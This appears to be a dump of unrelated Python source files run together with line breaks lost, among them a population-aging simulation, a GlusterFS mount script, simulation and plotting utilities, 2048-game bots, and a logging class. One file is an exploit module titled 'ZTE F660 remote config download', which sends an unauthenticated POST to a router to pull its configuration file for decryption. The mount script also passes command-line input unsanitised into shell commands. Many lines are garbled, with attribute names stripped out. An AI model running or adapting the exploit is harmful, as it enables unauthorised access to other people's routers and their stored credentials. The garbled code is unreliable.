else: iD[k]['q'] = v['q']*(0.5+v['a']) grorig=(v['gr'])/(senesce_simple(v['age'],v['rls'])) iD[k]['gr']=v['gr']/(senesce_simple((v['age']-1),v['rls']))*(senesce_simple(v['age'],v['rls'])) #modifier based on the newly incremented age value, after removing the gr reduction due to previous age #in full implementation the sscnc model will be chosen at random from a list of choices i = time.time() iD[i] = copy.deepcopy(iD[k]) iD[k]['age']+=1 #in addition to copying physiology, need to copy the rlsmax--- #rlsmax is determined genetically so there should be a chance of mutation, here with normally distributed #effect sizes iD[i]['rls']=np.random.normal((v['rls']),sD[v['sp']]['rlscv']*v['rls'],None) #pp(iD[k]['age']);pp(iD[k]['rls']) try: iD[i]['gr']=np.random.normal(grorig,(sD[v['sp']]['grcv']*grorig),None)#these should not be normal distrns, should be negv-biased iD[i]['mt']=np.random.normal(v['mt'],sD[v['sp']]['mtcv']*v['mt'],None) #is total ef allowed to != 1 except ValueError: del iD[i]; continue if iD[i]['gr'] > 1 or iD[i]['gr'] < 0: del iD[i]; continue iD[i]['q']=(v['q'])/(0.5+v['a'])*(0.5-v['a']) iD[i]['age']=0 return [sD, iD] def iter_procs(iD, sD, rD, ps, ct): procs = range(6) shuffle(procs) for p in procs: if p == 0: rD = ResIn(rD, ps) elif p == 1: pass#sD, iD = immigration(sD, iD, ps) elif p == 2: iD, rD = consume(iD, rD, ps) elif p == 3: iD = grow(iD) elif p == 4: iD = maintenance(iD) elif p == 5: sD, iD = reproduce(sD, iD, ps) N = len(list(iD)) return [iD, sD, rD, N, ct+1] def ResIn(rD, ps): r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps for i in range(r): p = np.random.binomial(1, u) if p == 1: ID = time.time() rD[ID] = {'t' : randint(0, 2)} rD[ID]['v'] = 10**np.random.uniform(0, 2) return rD def run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a=0, rD = {}, sD = {}, iD = {}, ct = 0, splist2 = []): print '\n' rD={};iD={};sD={} if iD=={} and sD=={} and rD=={}: pass else: sys.exit() r = choice([10,100])#10**randint(0, 2) u = 10**np.random.uniform(-2, 0) ps = r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a sD, iD = immigration(sD, iD, ps, 1000)#this is the initial number of indivs while ct < 2000:#this is the number of timesteps if ct < 1: print str(rls_min) + ' ' + str(rls_max) + " " + str(r) iD, sD, rD, N, ct = iter_procs(iD, sD, rD, ps, ct) if (ct > 1400 and ct%100 == 0) or (ct == 1): output(iD, sD, rD, sim, ct, r) for sim in range(500):#number of different models run (had been set at 10**6) seed(time.time()) gr = np.random.uniform(-2,-1) mt = np.random.uniform(-2,-1) rls_min = randint(1,10) rls_max = randint(rls_min,100) grcv = np.random.uniform(-6,-0.3) mtcv = np.random.uniform(-6,-0.3) rlscv = np.random.uniform(-6,-0.3) efcv = np.random.uniform(-6,-0.3) q = choice([1, 2]) a=.35#a can take values [0,0.5) run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a)
import json import os import sys import logging from subprocess import Popen, PIPE def mkdir(directory): if not os.path.isdir(directory): cmd = 'mkdir -p %s' % directory Popen(cmd, shell=True) def mount(entry_point, mount_point): # Check if the mount point exists. If not # go ahead and create it. # mount -t glusterfs entry_point mount_point cmd = 'mount -t glusterfs %s %s' % (entry_point, mount_point) output = Popen(cmd, stdout=PIPE, shell=True) def umount(mount_point): cmd = 'cat /etc/mtab | grep /service/data | awk \'{print $2}\'' output = Popen(cmd, stdout=PIPE, shell=True) if output.strip() != "": cmd = 'umount %s' % mount_point output = Popen(cmd, stdout=PIPE, shell=True) cmd = sys.argv[1] if cmd == "mount": entry = sys.argv[2] mkdir('/service/data') mount(entry, '/service/data') elif cmd == "umount": umount('/service/data')
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Copyright (C) 2011-2015 German Aerospace Center DLR (Deutsches Zentrum fuer Luft- und Raumfahrt e.V.), Institute of System Dynamics and Control All rights reserved. This file is part of PySimulator. PySimulator is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. PySimulator is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with PySimulator. If not, see ''' import csv, numpy, collections from .. import IntegrationResults fileExtension = 'csv' description = 'Comma Separated Values for FMI Compliance Checker' class Results(IntegrationResults.Results): ''' Class for hosting simulation results in csv format: First row: Names of variables First column: Independent variable, e.g. Time Example: Time,Mechanical.Inertia.J,y,Mechnical.Inertia.w 0.0,20.0,3.6820238572822689e-4,0.0 0.1,20.0,6.7829872398723383e-4,0.7293789273984797e-2 0.2,20.0,4.0290389058209473e-3,0.7823794579232536e-1 ''' def __init__(self, fileName): IntegrationResults.Results.__init__(self) self.fileName = fileName # File name of result file ''' Load file ''' ''' csvfile = open(self.fileName, 'rb') reader = csv.reader(csvfile, delimiter=';') self._name = # first row contains the variable names self._data = numpy.array(, dtype='float64') i=0 for row in reader: self._data = numpy.row_stack((self._data, numpy.array(row, dtype='float64'))) print i i=i+1 csvfile.close() ''' csvfile = open(self.fileName, 'rb') dialect = csv.Sniffer().sniff(csvfile.readline()) reader = csv.reader(csvfile, dialect) self._name = # first row contains the variable names self._info = len(self._name) * [''] self._filterName() data = numpy.loadtxt(csvfile, delimiter=dialect.delimiter) t = data[:, 0] self.timeSeries.append(IntegrationResults.TimeSeries(t, data, "linear")) self.nTimeSeries = len(self.timeSeries) csvfile.close() self.isAvailable = True # Shows, if there is a file available to be read def _filterName(self): for i in xrange(len(self._name)): x = self._name[i] k = x.find('=') if k > -1: # Skip the parts behind "=" self._info[i] = x[k:] x = x[:k] if len(x) > 5: # Convert der(a.b.c.d) to a.b.c.der(d) if x[:4] == 'der(': k = x.rfind('.') if k > -1: x = x[4:k] + '.der(' + x[k + 1:] self._name[i] = x def readData(self, variableName): nameIndex = self._name.index(variableName) if nameIndex < 0: return None, None, None y = self.timeSeries[0].data[:, nameIndex] t = self.timeSeries[0].independentVariable method = self.timeSeries[0].interpolationMethod return t, y, method def data(self, variableName): nameIndex = self._name.index(variableName) if nameIndex < 0: return None return self.timeSeries[0].data[:, nameIndex] def getVariables(self): # Generate the dict variables = dict() # Fill the values of the dict for i in xrange(len(self._name)): name = self._name[i] variability = 'continuous' value = None infos = collections.OrderedDict() infos['Variability'] = variability if not self._info[i] == '': infos['Description'] = self._info[i] unit = None seriesIndex = 0 column = i sign = 1 variables[name] = IntegrationResults.ResultVariable(value, unit, variability, infos, seriesIndex, column, sign) return variables def getFileInfos(self): # No relevant file infos stored in a csv result file return dict()
"""Add the high level classes (person/organization/etc.) to a label file.""" import argparse import pickle from tqdm import tqdm def read_arguments(): parser = argparse.ArgumentParser() parser.add_argument('--labels_file', type=unicode, help='Pickled file with a list of labels') parser.add_argument('--mapping_file', type=unicode, help='Pickled file with the mapping from yago labels' 'to high level labels') return parser.parse_args() def pickle_from_file(filename): with open(filename, 'r') as input_file: result = pickle.load(input_file) return result def main(): args = read_arguments() print 'Reading arguments' labels = pickle_from_file(args.labels_file) mapping = pickle_from_file(args.mapping_file) print 'Processing labels' for index, label in tqdm(enumerate(labels)): if len(label) != 5: print 'Malformed label at index {}'.format(index) continue if label[0].startswith('O'): continue yago_category = label[1].replace('I-', '').replace('B-', '') if not yago_category in mapping: print 'Error, unknown yago category {}'.format(yago_category) continue high_level_category = label[1][0] + '-' + mapping[yago_category] labels[index] = label[:3] + (high_level_category, ) + label[4:] print 'Saving results' with open(args.labels_file, 'w') as output_file: pickle.dump(labels, output_file) if __name__ == '__main__': main()
import logging import json import sys import tempfile from mimetypes import guess_type from django.http import HttpResponse from django.conf import settings from cam.models import WebCam, is_file_image logger = logging.getLogger(__name__) def get_snapshot(request): "Take a webcam snapshot and return it as HTTP response" content_type = 'application/json' body = json.dumps('Failed snapshot') # Try every available WebCam object to take the snapshot, # until the first one that succeeds for cam in WebCam.objects.all().order_by('priority'): logger.debug('Attempting saveSnapshot with %s' % (cam)) snapshot_file = cam.saveSnapshot() if snapshot_file and is_file_image(snapshot_file): content_type, _ = guess_type(snapshot_file) if content_type: body = open(snapshot_file, 'rb').read() break else: content_type = 'application/json' return HttpResponse(body, content_type=content_type)
import random class _AI: def get_command_letter(self, command): if command == 0: return "w" elif command == 1: return "a" elif command == 2: return "s" else: return "d" class RandomAI(_AI): def __init__(self): = "random_ai" def get_next_command(self, available_commands): self.current_command = random.randint(0, 3) return self.get_command_letter(self.current_command) class DirectionAI(_AI): def __init__(self): = "direction_ai" def get_next_command(self, available_commands): if available_commands["s"]: # Prefer "down" movements return "s" elif available_commands["a"]: # Then "left" return "a" elif available_commands["d"]: # Then "right" return "d" else: # Only move "up" if no others are available return "w" class PairCheckAI(_AI): def __init__(self): = "pair_check_ai" self.direction_points = {"w": 0, "a": 0, "s": 0, "d": 0} def get_next_command(self, available_commands): # Check which direction to move # print("calculating points for board:") h_points = self.calc_points(self.board) rotated_board = self.rotate_board(self.board) v_points = self.calc_points(rotated_board) # No points, return a random direction if h_points == 0 and v_points == 0: # print("nothing, random movement") return self.get_command_letter(random.randint(0, 3)) # print("h: " + str(h_points)) # print("v: " + str(v_points)) # Up/down and left/right scores are the same self.direction_points["w"] = v_points self.direction_points["a"] = h_points self.direction_points["s"] = v_points self.direction_points["d"] = h_points dir_letter = max(self.direction_points, key=self.direction_points.get) # print("moving: " + dir_letter) return dir_letter def update_board(self, board): self.board = board # Calculates the number of points in each row def calc_points(self, board): # self.print_board(board) total_score = 0 for row in board: score = 0 for n in row: if n == 0: pass elif score == 0: score = n elif score != n: score = n elif score == n: # will_score = True score *= 2 total_score += score score = 0 return total_score # Rotates the board def rotate_board(self, board): row_size = len(board) board_size = row_size ** 2 rotated = [] for i in range(0, row_size): rotated.append([]) for i in range(0, board_size): rotated[i / row_size].append(board[i % row_size][i / row_size]) return rotated def print_board(self, board): for i in board: print(i)
# Name:ZTE F660 remote config download # # Author:Ján Trenčanský # License: GNU GPL v3 # Created: 25.12.2015 # Last modified: 25.12.2015 # Shodan Dork: # Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST # Based on: import core.Exploit import import requests from interface.messages import print_error, print_success, print_warning, print_info class Exploit(core.Exploit.RextExploit): """ Name:ZTE F660 remote config download Author:Ján Trenčanský License: GNU GPL v3 Created: 25.12.2015 Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST Based on: Options: Name Description host Target host address port Target port """ def __init__(self): core.Exploit.RextExploit.__init__(self) def do_run(self, e): url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (, self.port) try: print_warning("Sending exploit") # It took me longer than necessary to find out how to use Content-Disposition properly # Always set stream=True otherwise you may not get the whole file response =, files={'config': ''}, timeout=60, stream=True) if response.status_code == 200: if response.headers.get('Content-Disposition'): print_success("got file in response") print_info("Writing file to config.bin"), "config.bin") print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML") except requests.ConnectionError as e: print_error("connection error %s" % e) except requests.Timeout: print_error("timeout") Exploit()
import ReactionMaker.inversion as inversion import ReactionMaker.duplicate as duplicate import ReactionMaker.increment as increment import ReactionMaker.decrement as decrement import ReactionMaker.multiply as multiply import ReactionMaker.logarithm as logarithm import ReactionMaker.power as power import Simulator.XMLParser as XMLParser def getHistoryFileName(xmlFileName): y = xmlFileName[:-3] return 'history_' + y + 'txt' def printWelcomeMessage(): print "Welcome to the Chemical Computer world!!" def executeInversion(): var = raw_input("Enter the value you want to invert: ") return inversion.execute(var) def executeDuplicate(): var = raw_input("Enter the value you want to duplicate: ") return duplicate.execute(var) def executeDecrement(): var = raw_input("Enter the value you want to decrement: ") return decrement.execute(var) def executeIncrement(): var = raw_input("Enter the value you want to increment: ") return increment.execute(var) def executeMultiply(): input1 = raw_input("Enter the value of input 1: ") input2 = raw_input("Enter the value of input 2: ") return multiply.execute(input1,input2) def executeLogarithm(): var = raw_input("Enter the value you want to take logarithm of: ") return logarithm.execute(var) def executePower(): input1 = raw_input("Enter the value of base: ") input2 = raw_input("Enter the value of exponent: ") return power.execute(input1,input2) def showMainMenu(): print "Enter your choice here: " print "1: Basic Functions" print "2: Advanced Functions" print "3: Exit" def showBasicFunctionsMenu(): print "Select any one of the below basic function" print "1: Inversion" print "2: Duplication/Copy" print "3: Decrementation" print "4: Incrementation" def showAdvancedFunctionsMenu(): print "Select any one of the below advanced function" print "1: Multiplication" print "2: Logarithm" print "3: Power" def showInvalidMessageAndQuit(): print "Please select only one of the given choice" print "Quitting the Chemical World ..." quit() def plotResults(xmlFile,chemicalList,timeOfSimulation): historyFile = getHistoryFileName(xmlFile) sim = XMLParser.getSimulator(xmlFile) sim.simulate(timeOfSimulation,historyFile) sim.plot(chemicalList) def executeBasicFunction(userChoice): outputFileName = '' chemicalList = [] if userChoice == 1: outputFileName,chemicalList = executeInversion() elif userChoice == 2: outputFileName,chemicalList = executeDuplicate() elif userChoice == 3: outputFileName,chemicalList = executeDecrement() elif userChoice == 4: outputFileName,chemicalList = executeIncrement() else: showInvalidMessageAndQuit() print 'Result File ' + outputFileName + ' Created' timeOfSimulation = int(raw_input('Enter Time Of Simulation: ')) plotResults(outputFileName,chemicalList,timeOfSimulation) def executeAdvancedFunction(userChoice): outputFileName = '' chemicalList = [] if userChoice == 1: outputFileName,chemicalList = executeMultiply() elif userChoice == 2: outputFileName,chemicalList = executeLogarithm() elif userChoice == 3: outputFileName,chemicalList = executePower() else: showInvalidMessageAndQuit() print 'Result File ' + outputFileName + ' Created' timeOfSimulation = int(raw_input('Enter Time Of Simulation: ')) plotResults(outputFileName,chemicalList,timeOfSimulation) def executeUserChoice(userChoice): if userChoice == 1: showBasicFunctionsMenu() userChoice = int(input()) executeBasicFunction(userChoice) elif userChoice == 2: showAdvancedFunctionsMenu() userChoice = int(input()) executeAdvancedFunction(userChoice) elif userChoice == 3: print "Quitting the Chemical World ..." quit() else: showInvalidMessageAndQuit() def main(): printWelcomeMessage() while True: print "" showMainMenu() userChoice = int(input()) executeUserChoice(userChoice) main()
# -*- coding: utf-8 -*- import os, sys import time import traceback from dCore import * class DamnLog: def __init__(self, logpath=None, stderr=True, flush=False, handleerrors=True, overrides={}): DamnLog.instance = self self.time = 0 self.streams = [] self.autoflush = flush self.overrides = {} if logpath is not None: try: if not os.path.exists(os.path.dirname(logpath)): os.makedirs(os.path.dirname(logpath)) f = DamnOpenFile(logpath, 'wb') self.streams.append(f) f.write((self.getPrefix() + u'Log opened.').encode('utf8')) except: try: print 'Warning: Couldn\'t open log file!' traceback.print_exc() except: pass if stderr: self.streams.append(sys.stdout) if handleerrors: try: sys.excepthook = self.logException except: self.log('!! Cannot override excepthook. This looks bad.') def getPrefix(self): t = int(time.time()) if self.time != t: self.time = t return u'[' + DamnUnicode(time.strftime('%H:%M:%S')) + u'] ' return u'' def write(self, message): message = u'\r\n' + (self.getPrefix() + DamnUnicode(message.strip())).strip() for s in self.streams: try: print >> s, message.encode('utf8'), except: try: print 'Could not print to stream', s,'message:', message.strip() except: pass if self.autoflush: self.flush() def log(self, *args): import dCore s = [] for i in args: i = dCore.DamnUnicode(i) for k in self.overrides.iterkeys(): i = i.replace(k, self.overrides[k]) s.append(i) return self.write(u' '.join(s)) def logException(self, typ, value, tb): import traceback import dCore import dLog try: info = traceback.format_exception(typ, value, tb) e = [] for i in info: e.append(dCore.DamnUnicode(i).strip()) self.log('!!',u'\n'.join(e)) except: try: self.log('!! Error while logging exception. Something is very wrong.') except: pass # Something is very, very wrong. def flush(self): for s in self.streams: try: s.flush() except: pass try: os.fsync(s) except: pass def close(self): self.log('Closing log.') for s in self.streams: if s != sys.stderr: try: s.close() except: pass def addOverride(target, replacement=u''): self.overrides[DamnUnicode(target)] = DamnUnicode(replacement) def Damnlog(*args): if DamnLog.__dict__.has_key('instance'): return DamnLog.instance.log(*args) return None def DamnlogException(*args): if DamnLog.__dict__.has_key('instance'): return DamnLog.instance.logException(*args) return None def DamnlogOverride(target, replacement=u''): DamnLog.instance.addOverride(target, replacement)
#!/usr/bin/env python import os import sys import os.path as op import mtpy.core.edi as MTedi def main(): fn = sys.argv[1] if not op.isfile(fn): print('\n\tFile does not exist: {0}\n'.format(fn)) sys.exit() saveplot = False if len(sys.argv) > 2: arg2 = sys.argv[2] if 's' in arg2.lower(): saveplot = True fn = plotedi(fn, saveplot) def plotedi(fn, saveplot=False, component=None): edi = MTedi.Edi() try: edi.readfile(fn) except: print('\n\tERROR - not a valid EDI file: {0}\n'.format(fn)) sys.exit() # if saveplot is True: # import matplotlib # matplotlib.use('Agg') import pylab lo_comps = [] if component is not None: 'n' in component.lower() try: if 'n' in component.lower(): lo_comps.append('n') except: pass try: if 'e' in component.lower(): lo_comps.append('e') except: pass if len(lo_comps) == 0: lo_comps = ['n', 'e'] res_te = [] res_tm = [] phi_te = [] phi_tm = [] reserr_te = [] reserr_tm = [] phierr_te = [] phierr_tm = [] for r in edi.Z.resistivity: res_te.append(r[0, 1]) res_tm.append(r[1, 0]) for p in edi.Z.phase: phi_te.append(p[0, 1] % 90) phi_tm.append(p[1, 0] % 90) if > 90 and > 90: phi_te = [i % 90 for i in phi_te] phi_tm = [i % 90 for i in phi_tm] for r in edi.Z.resistivity_err: reserr_te.append(r[0, 1]) reserr_tm.append(r[1, 0]) for p in edi.Z.phase_err: phierr_te.append(p[0, 1]) phierr_tm.append(p[1, 0]) periods = 1. / edi.freq resplotelement_xy = None resplotelement_yx = None axes = pylab.figure('EDI ' + fn) ax1 = pylab.subplot(211) if 'n' in lo_comps: resplotelement_xy = pylab.errorbar( periods, res_te, reserr_te, marker='x', c='b', fmt='x') if 'e' in lo_comps: resplotelement_yx = pylab.errorbar( periods, res_tm, reserr_tm, marker='x', c='r', fmt='x') pylab.xscale('log', nonposx='clip') pylab.yscale('log', nonposy='clip') minval = pylab.min(pylab.min(res_te, res_tm)) maxval = pylab.max(pylab.max(res_te, res_tm)) pylab.xlim(0.5 * pylab.min(periods), 2 * pylab.max(periods)) # ylim([0.1,100]) pylab.ylim([minval / 10, maxval * 10]) pylab.autoscale(False) pylab.ylabel(r' $\rho$ (in $\Omega m$)') pylab.setp(ax1.get_xticklabels(), visible=False) # share x only ax2 = pylab.subplot(212, sharex=ax1) pylab.autoscale(False) # ylim(-45,135) if 'n' in lo_comps: pylab.errorbar(periods, phi_te, phierr_te, marker='x', c='b', fmt='x') if 'e' in lo_comps: pylab.errorbar(periods, phi_tm, phierr_tm, marker='x', c='r', fmt='x') pylab.ylabel('Phase angle ($\degree$)') pylab.xlabel('Period (in s)') pylab.plot([pylab.xlim()[0], pylab.xlim()[1]], [45, 45], '-.', c='0.7') pylab.ylim([-0, 90]) ax1.legend([resplotelement_xy, resplotelement_yx], ['$E_{X}/B_Y$', '$E_Y/B_X$'], loc=2, ncol=1, numpoints=1, markerscale=0.8, frameon=True, labelspacing=0.3, prop={'size': 8}, fancybox=True, shadow=False) pylab.tight_layout() if saveplot is True: pylab.ioff() outfn = op.splitext(fn)[0] + '.png' pylab.savefig(outfn, bbox_inches='tight') pylab.close('all') pylab.ion() return outfn else: pylab.ion() return None if __name__ == '__main__': main()